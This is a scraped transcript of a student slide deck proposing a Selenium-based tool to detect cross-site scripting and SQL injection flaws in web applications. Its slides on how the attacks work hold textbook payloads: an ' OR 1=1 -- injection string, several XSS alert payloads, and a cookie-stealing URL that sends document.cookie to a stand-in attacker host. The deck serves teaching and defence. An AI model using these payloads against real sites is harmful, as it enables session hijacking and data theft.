Presentation is loading. Please wait.

Presentation is loading. Please wait.

Security Tool to Detect Vulnerabilities at Application Level Sendurr Selvaraj Naga Sri Charan Pendyala Rama Krishna Chaitanya Somavajhala Srujana Bollina.

Published byAlbert Watkins Modified over 8 years ago

Similar presentations

Presentation on theme: "Security Tool to Detect Vulnerabilities at Application Level Sendurr Selvaraj Naga Sri Charan Pendyala Rama Krishna Chaitanya Somavajhala Srujana Bollina."— Presentation transcript:

1 Security Tool to Detect Vulnerabilities at Application Level Sendurr Selvaraj Naga Sri Charan Pendyala Rama Krishna Chaitanya Somavajhala Srujana Bollina Udaya Shyama Pallathadka Ganapathi Bhat [1] R Ben Stock, Stephan Pfistner, Bernd Kaiser, Sebastian Lekies and Martin Johns: From Facepalm to Brain Bender: Exploring Client-Side Cross-Site Scripting, in 22th ACM Conference on Computer and Communications Security (ACM CCS'15), October 2015 [2] S. Lekies, B. Stock, and M. Johns. 25 Million Flows Later: Large-scale Detection of DOM-based XSS. In CCS, 2013 [3] Dennis Appelt, Cu Duy Nguyen, Lionel C. Briand, and Nadia Alshahwan. 2014. Automated testing for SQL injection vulnerabilities: an input mutation approach. In Proceedings of the 2014 International Symposium on Software Testing and Analysis (ISSTA 2014). ACM, New York, NY, USA, 259-269.

2 Outline  Introduction  SQL Injection and Cross Site Scripting  Client Side XSS  Problem Statement  Examples and Impact of XSS  Selenium Webdriver and its Usage  Proposed Approach to solve XSS attack  Questions and Discussion

3 Introduction :  1 st Website: August 6, 1991  1 Billion+ Counting……………………… Source: http://intellavis.com/blog/?p=284http://intellavis.com/blog/?p=284

4 Introduction:  Different vulnerabilities that are present in web applications:  SQL Injection  XSS – Cross-site scripting  CSRF – Cross-site request forgery

5 SQL Injection  SQL Injection attacks target database-­‐driven systems by injecting SQL code fragments into vulnerable input parameters that are not properly checked and sanitized.

6 SQL Injection  Parameter: $country <- ‘United States of America’  Resulting Statement: SELECT * FROM hotelList WHERE country=‘United States of America‘  Attacker Input: $country<- ‘ OR 1=1 –’  Resulting Statement: SELECT * FROM hotelList WHERE country=‘ ‘OR 1=1 - -’  https://www.youtube.com/watch?v=h-9rHTLHJTY https://www.youtube.com/watch?v=h-9rHTLHJTY

7 SQL Injection  Confidentiality: SQL databases generally hold sensitive data  Authentication: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.  Authorization: If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL Injection vulnerability.  Integrity: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL Injection attack. Source: OWASP.ORG

8 What is Cross-Site Scripting? (CSS/XSS)  An attacker is able to inject his own JavaScript code into a web application, in such a way that the code is executed within a victim’s browser in the context of application.  Types:  Persistent XSS (Stored XSS)  Reflected XSS (Non-Persistent XSS)  DOM-based XSS (Local XSS)  Players Include:  An Attacker  Web Application  Client Server side Client side

9 Client Side Cross-Site Scripting  Client XSS occurs when untrusted user supplied data is used to update the DOM with an unsafe JavaScript call  A JavaScript call is considered unsafe if it can be used to introduce valid JavaScript into the DOM  Source of this data could be from the DOM, or it could have been sent by the server (via an AJAX call, or a page load or page submission).

10 Client Side Cross-Site Scripting  As per the authors of paper[1], studies have shown that one in ten websites are vulnerable to XSS attack  Authors discover that root causes of client side XSS range from unaware developers to incompatible first- and third- party codes  A set of 1273 vulnerabilities in Alexa Top 10k domains are analyzed and classified based on the complexity

11 Cross-Site Scripting: Problem statement ● Main problem: attacker‘s content ends in document and is not properly filtered/encoded ● common for server- and client-side flaws ● Flow of data: from attacker-controllable source to security- sensitive sink ● Authors Focus: client side JavaScript code ● Sources: e.g. the URL ● Sinks: e.g. document.write

12 Examples of XSS Vulnerabilities alert(“Hacked..!!”)

13 <img src=x onerror="alert('Pop-up window via stored XSS');“

14 Cookie Stealing http://www.malicious.site/welcome.html?name= alert(document.cookie) http://www.malicious.site/welcome.cgi?name= window.open( “http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)

15  Name parameter is protected : http://www.malicious.site/welcome.html?notname= (document.cookie)  More secure and requires name parameter to be sent: http://www.malicious.site/welcome.html?notname= alert(document.cookie) &name=John

16 Source : https://isc.sans.edu/diaryimages/youtube.png

17 Examples of DOM-based XSS Vulnerabilities 1. alert('xss'); 2. <img src=x onerror="alert('Pop-up window via stored XSS');“ 3. Document.write(“ ”);

18 DOM XSS will appear when a source that can be controlled by the user is used in a dangerous sink. Popular Sources  document.URL  document.documentURI  location.href  location.search  location.*  window.name  document.referrer Popular Sinks  HTML Modification sinks  document.write  (element).innerHTML  HTML modification to behaviour change  (element).src (in certain elements)  Execution Related sinks  eval  setTimout / setInterval  execScript

19 Impacts of XSS  Denial-of-Service  Crash Users`Browser, Pop-Up-Flodding, Redirection  attacker can hijack a logged in user’s session. Access to authentication credentials for Web application  Cookies, Username and Password  Spoil public image of company

20 Securing a site against XSS attacks  By performing “in-house” input filtering (input sanitation)  By performing “output filtering

21 Selenium WebDriver  What is Selenium?  Selenium is a cross-platform solution to perform automated testing of web applications.  Open source framework  Successor to Selenium RC  Fully implemented and supported in Python, Ruby, Java, and C#

22 Selenium WebDriver API  Interaction with page DOM elements (Finding Elements)  Operations on DOM elements (Click, Sendkeys, Drag&Drop etc)  Multi-Window handling and switching between frames  WebDriver Waits to handle AJAX based operations

23 Driving Web browsers  Selenium helps to interact with Web applications through web browsers.  It has web drivers that are supported  Internet Explorer driver  Opera Driver  Chrome Driver  Firefox Driver  iPhone Driver  Android Driver  HtmlUnit Driver  Interactions with the web page and DOM elements can be commanded through these drivers using a programming language

24 Ways to find elements  Elements on page can be found using DOM properties of the element  Ways to find  By.Id(“id”);  By.CssSelector(“Selector”);  By.Xpath(“//xpath’’);  By.ClassName(“name”);  By.LinkText(“linktext”);  By.TagName(“tagname”);

25 WebDriver and Injection of Scripts  Can be used interact an input text into fields on web page.  Steps to inject scripts  Find element  Send keys (input script in form of text)  Submit script (click submit element on the page)  Post injection validation  Changes to the page can be analyzed by validation  Test cases are built based on scripts and respective validations

26 Intended approach  Windows Form application  Exporting vulnerabilities to remote Database  Chrome Extension

27 Windows Form application  Tool that handles test cases which can be built by developers  Test cases can be developed specific to the vulnerability  Specific to vulnerability, test cases can be used to more than one website  Test cases can be shared among developer groups – scope to open source  Each test case includes script injection and post-validation  Scripts can be fed to the tool in a conventional data format like Excel  Failed test case detection  Post injection validation on the page

28 Exporting vulnerabilities to remote Database  Vulnerable URL and selectors of corresponding elements are exported to remote MySQL Database  If failed the tool exports  URL of the website  Selector of Input text field  Selector of element that submits the page data.

29 Chrome Extension  Communicates with latest updated vulnerabilities recorded  Presents the vulnerabilities to end users when they arrive to vulnerable website.  Can be presented visually to end user with the help of selectors

30 Recap..  One in Ten websites are infected with XSS vulnerability  With growing security concerns at application level, it is important to focus on XSS vulnerability  There is no single reason for XSS vulnerability, reasons include developers unaware of vulnerability, use of first- and third party outdated libraries  We discussed examples and impact of XSS  We build windows form application to help developers build test cases  Give users of chrome with an extension that would help them block sites vulnerable to XSS

31 Questions and Discussion Image source: http://en.hdyo.org/http://en.hdyo.org/

Download ppt "Security Tool to Detect Vulnerabilities at Application Level Sendurr Selvaraj Naga Sri Charan Pendyala Rama Krishna Chaitanya Somavajhala Srujana Bollina."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Team Members: Brad Stancel,

Team Members: Brad Stancel,
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
March Intensive: XSS Exploits

March Intensive: XSS Exploits
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
269200 Web Programming Language Dr. Ken Cosh Week 1 (Introduction)

Web Programming Language Dr. Ken Cosh Week 1 (Introduction)
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March

Similar presentations

Ads by Google